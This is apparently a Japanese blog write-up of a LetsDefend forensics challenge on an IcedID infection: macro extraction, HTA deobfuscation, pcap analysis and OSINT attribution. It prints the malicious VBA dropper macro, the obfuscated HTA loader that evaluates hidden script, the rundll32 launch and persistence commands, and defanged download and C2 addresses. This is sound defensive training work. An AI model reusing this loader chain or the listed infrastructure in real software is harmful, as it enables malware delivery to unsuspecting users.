4ensiX

4ensiX

FPと言ったものはFPを選んだが表示はTPになっていることに気づいた。

LetsDefend Challenge DFIR: IcedID Malware Family writeup

LetsDefend Challenge DFIR: IcedID Malware Family

What is the sha256 hash for the malspam attachment?

何か前提がありそうで説明には書いていないのでよく分からないが,docがメールの添付ファイル?

$ sha256sum 'docs 06.02.2021.doc'
cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1  docs 06.02.2021.doc

Answer: cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1

What is the child process command line when the user enabled the Macro?

先ほどのdocファイルは,

$ file docs\ 06.02.2021.doc 
docs 06.02.2021.doc: Microsoft Word 2007+

Microsoft Word 2007+なので,ならoletoolsでマクロを見れる.

$ olevba -c docs\ 06.02.2021.doc 
olevba 0.60.1 on Python 2.7.17 - http://decalage.info/python/oletools
===============================================================================
FILE: docs 06.02.2021.doc
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO leftSize.bas 
in file: word/vbaProject.bin - OLE stream: u'VBA/leftSize'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub autoopen()
initVba
Shell "explorer collectionBoxConst.hta", vbNormalFocus
End Sub
-------------------------------------------------------------------------------
VBA MACRO arrayBBorder.bas 
in file: word/vbaProject.bin - OLE stream: u'VBA/arrayBBorder'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub initVba()
Open "collectionBoxConst.hta" & buttTemplateHeader For Output As #1
Print #1, ActiveDocument.Range.Text
Close #1
End Sub

.exeを付けてくださいと言われたので.
Answer: explorer.exe collectionBoxConst.hta

What is the HTML Application file's sha256 hash from previous question?

前の質問で実行されていたファイルのこと

$ sha256sum collectionBoxConst.hta 
b25865183c5cd2c5e550aca8476e592b62ed3e37e6b628f955bbed454fdbb100  collectionBoxConst.hta

Answer: b25865183c5cd2c5e550aca8476e592b62ed3e37e6b628f955bbed454fdbb100

Based on the previous question, what is the DLL run method?

collectionBoxConst.htaは,そのままだととても見づらい.
Beautifyを使うと見やすくなる.

/ <html>
  <body>
    <div id='copyCurrencyMemory'>fX17K(省略)mVmZVJ0c3VydCByYXY=aGVsbG8msscriptcontrol.scriptcontrol</div>
    <div id='vConstBorder'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div>
    <script language='javascript'>
      function WLongPtr(altListVba) {
        return (new ActiveXObject(altListVba));
      }

      function objButtBool(headerListbox) {
        return (removeConstFunction.getElementById(headerListbox).innerHTML);
      }

      function boolOptionClass() {
        return (objButtBool('vConstBorder'));
      }

      function sinBooleanCur(s) {
        var e = {};
        var i;
        var b = 0;
        var c;
        var x;
        var l = 0;
        var a;
        var memSetByte = '';
        var w = String.fromCharCode;
        var L = s.length;
        var intBorder = zeroI('tArahc');
        for (i = 0; i < 64; i++) {
          e[boolOptionClass()[intBorder](i)] = i;
        }
        for (x = 0; x < L; x++) {
          c = e[s[intBorder](x)];
          b = (b < < 6) + c;
          l += 6;
          while (l >= 8) {
            ((a = (b >>> (l -= 8)) & 0xff) || (x < (L - 2))) && (memSetByte += w(a));
          }
        }
        return (memSetByte);
      };

      function zeroI(genTempTextbox) {
        return genTempTextbox.split('').reverse().join('');
      }
      procDocumentI = window;
      removeConstFunction = document;
      procDocumentI.resizeTo(1, 1);
      procDocumentI.moveTo(-100, -100);
      var genericBoolean = removeConstFunction.getElementById('copyCurrencyMemory').innerHTML.split("aGVsbG8");
      var collectRightSingle = zeroI(sinBooleanCur(genericBoolean[0]));
      var vData = zeroI(sinBooleanCur(genericBoolean[1]));
      var viewPointerConvert = genericBoolean[2];
    </script>
    <script language='vbscript'>
      Function classResponseLocal(copyCurrencyMemory): Set snglSngTpl = CreateObject(viewPointerConvert): With snglSngTpl: .language = "jscript": .timeout = 60000: .eval(copyCurrencyMemory): End With: End Function
    </script>
    <script language='vbscript'>
      Call classResponseLocal(collectRightSingle)
    </script>
    <script language='vbscript'>
      Call classResponseLocal(vData)
    </script>
    <script language='javascript'>
      procDocumentI['close']();
    </script>
  </body>
</html>

base64等で難読化された何かをVBScriptで実行している箇所が2つある.

Call classResponseLocal(collectRightSingle)
Call classResponseLocal(vData)

実行に関わる辺りを取って表示する.後ろの方だけ変えて,再びcodebeautifyで実行する.

(変更した周辺箇所のみ表示)
      var viewPointerConvert = genericBoolean[2];
      document.write(" < br > < br > ");document.write(collectRightSingle);document.write(" < br > < br > ");document.write(vData);
    </script>
  </body>
</html>
(これ以降は削除)

こうして,取得できたのが以下のスクリプト
document.write(collectRightSingle);で表示されたもの.

collectRightSingle

document.write(vData);で表示されたもの.
vData

改行とインデントは何となく付けたものなので変ですかね.
2つのスクリプトが見える.ここで問われているのは,what is the DLL run method? ということで,
dllの方はフルパスでということなので.
Answer: "C:\Windows\System32\rundll32.exe" c:\users\public\collectionBoxConst.jpg,PluginInit

What is the image file dll installer sha256 hash from previous question?

難読化解除した前問のコマンドで利用されていたファイル.

$ sha256sum collectionBoxConst.jpg 
51658887e46c88ed6d5861861a55c989d256a7962fb848fe833096ed6b049441  collectionBoxConst.jpg
$ file collectionBoxConst.jpg 
collectionBoxConst.jpg: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

このjpgファイルPEか.
Answer: 51658887e46c88ed6d5861861a55c989d256a7962fb848fe833096ed6b049441

What are the IP address and its domain name hosted installer DLL?

installer DLLは,jpgに見せかけたPEファイルのことで,collectionBoxConst.jpgをダウンロードしたドメインのipを知りたい. コマンド実行時にドメイン名見えてたから,そのip引っ張ってこれば良いと思ったがip変わっているようなので,配布されているpcapでコマンド実行したときのipを確認しなければいけない.

$ tshark -r infection-traffic.pcap -Y "http.request"
    6   0.377723   10.6.2.103 → 45.142.213.105 HTTP 616 GET /adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC HTTP/1.1 
  966   8.610776   10.6.2.103 → 172.67.169.59 HTTP 334 GET / HTTP/1.1

どうやらipは45[.]142.213.105らしい.一応確認のため.

$ tshark -r infection-traffic.pcap -Y "http.request && ip.dst == 45.142.213.105" -V
(確認したかったところ以外省略)
    Arrival Time: Jun  2, 2021 16:49:58.629124000 EDT
(snip)
    Source: 10.6.2.103
    Destination: 45.142.213.105
Transmission Control Protocol, Src Port: 57592, Dst Port: 80, Seq: 1, Ack: 1, Len: 562
    Source Port: 57592
    Destination Port: 80
 (snip)
    Host: coursemcclurez.com\r\n
(snip)

Answer: 45[.]142.213.105, coursemcclurez[.]com
[.]はエスケープしているので,解答時は異なる.

What is the full URL for the DLL installer?

jpgに見せかけたPEファイルをダウンロードしたURL.(http://をhttp[:]//にしている.) Answer: http[:]//coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC

What are the two IP addresses identified as C2 servers?

pcapで見えるipは8つあった.

$ tshark -r infection-traffic.pcap -z conv,ip -q
================================================================================
IPv4 Conversations
Filter:<No Filter>
                                               |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.6.2.103           <-> 194.5.249.46            1411   1987761     907     68828    2318   2056589    72.878155000        72.6158
10.6.2.103           <-> 172.67.169.59            548    778140     317     22306     865    800446     8.578007000        63.0912
10.6.2.103           <-> 38.135.122.194           418     41897     446    189140     864    231037   534.534514000       157.2711
10.6.2.103           <-> 45.142.213.105           402    573316     284     20504     686    593820     0.193640000         2.8731
10.6.2.103           <-> 65.8.218.70              183    252853      90      5755     273    258608     7.335177000        64.3388
10.6.2.103           <-> 185.33.85.35              70     13979      73     11177     143     25156    13.384999000       663.2378
10.6.2.1             <-> 10.6.2.103                 8       600       8       822      16      1422     0.000000000       675.7458
================================================================================

10[.]6.2.103と通信しているipは6つあり,45[.]142.213.105はダウンロードしただけと分かっている.
イマイチどれをピックアップするか分からないため,全部virustotal通すと38[.]135.122.194,194[.]5.249.46,185[.]33.85.35にフラグが立ったのでこれを組み合わせていくと.
Answer: 185[.]33.85.35, 194[.]5.249.46
例の如く,[.]
かなり適当になってしまったので,もう少し根拠が欲しい.全部怪しい.

What are the four C2 domains identified in the PCAP file?

ドメインというのでdnsを見てみると,

$ tshark -r infection-traffic.pcap -Y "dns"
Running as user "root" and group "root". This could be dangerous.
    1   0.000000   10.6.2.103 → 10.6.2.1     DNS 78 Standard query 0xc544 A coursemcclurez.com
    2   0.177849     10.6.2.1 → 10.6.2.103   DNS 94 Standard query response 0xc544 A coursemcclurez.com A 45.142.213.105
  689   7.268986   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xc52c A aws.amazon.com
  690   7.317488     10.6.2.1 → 10.6.2.103   DNS 168 Standard query response 0xc52c A aws.amazon.com CNAME tp.8e49140c2-frontier.amazon.com CNAME dr49lng3n1n2s.cloudfront.net A 65.8.218.70
  961   8.509279   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0x2368 A supplementik.top
  962   8.575830     10.6.2.1 → 10.6.2.103   DNS 108 Standard query response 0x2368 A supplementik.top A 172.67.169.59 A 104.21.79.67
 1825  13.295954   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xaa92 A fimlubindu.top
 1826  13.382333     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xaa92 A fimlubindu.top A 185.33.85.35
 1848  72.785911   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0xa7f4 A extrimefigim.top
 1849  72.876395     10.6.2.1 → 10.6.2.103   DNS 92 Standard query response 0xa7f4 A extrimefigim.top A 194.5.249.46
 1898  77.243965   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xcb22 A kilodaser4.fit
 1899  77.308989     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xcb22 A kilodaser4.fit A 185.33.85.35
 1911  77.687111   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe452 A arhannexa5.top
 1913  77.774932     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe452 A arhannexa5.top A 185.33.85.35
 5149 675.694370   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe5b5 A arhannexa5.top
 5150 675.745802     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe5b5 A arhannexa5.top A 185.33.85.35

185[.]33.85.35と194[.]5.249.46がc2であったと分かったので.
Answer: arhannexa5[.]top, extrimefigim[.]top, fimlubindu[.]top, kilodaser4[.]fit
[.]...

After the DLL installer being executed, what are the two domains that were being contacted by the installer DLL?

coursemcclurez[.]comへのすぐ後のdnsクエリを見ると
Answer: aws[.]amazon[.]com, supplementik[.]top

The malware generated traffic to an IP address over port 8080 with two SYN requests, what is the IP address?

問題で要求されている通りにフィルターして探す.

$ tshark -r infection-traffic.pcap -Y "tcp.flags.syn==1 && tcp.port == 8080"
 4275 534.534514   10.6.2.103 → 38.135.122.194 TCP 66 57609 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
 4276 534.589017 38.135.122.194 → 10.6.2.103   TCP 66 8080 → 57609 [SYN, ACK] Seq=0 Ack=1 Win=55520 Len=0 MSS=1388 SACK_PERM=1 WS=256
 4292 571.503808   10.6.2.103 → 38.135.122.194 TCP 66 57614 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
 4293 571.558688 38.135.122.194 → 10.6.2.103   TCP 66 8080 → 57614 [SYN, ACK] Seq=0 Ack=1 Win=55520 Len=0 MSS=1388 SACK_PERM=1 WS=25

Answer: 38[.]135.122.194
[.]...

The license.dat file was used to create persistance on the user's machine, what is the dll run method for the persistance?

persistanceというからにはここら辺で,scheduled-task.txtを見るという事ですかね.

$ cat 2021-06-02-scheduled-task.txt
(snip)
      <Command>rundll32.exe</Command>
      <Arguments>"C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"</Arguments>
(snip)

Answer: C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat

With OSINT, what is the malware family name used in this PCAP capture?

このチャレンジのタイトルにもなっているが,始めのdocをmalware bzaarで調べるのが一番分かりやすい.
https://bazaar.abuse.ch/sample/cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1/
Answer: IcedID

Based on Palo Alto Unit 42, what is the APT Group name?

調べます.
TA551: Email Attack Campaign Switches from Valak to IcedID
Answer: TA551

What is the Mitre Attack code for the initial access in this campaign?

先ほどのTA551の記事とmitreのInitial Accessをしばらく眺める.どれが一番適しているだろうか.添付ファイルの話から始まったぽいので.
Answer: T1566.001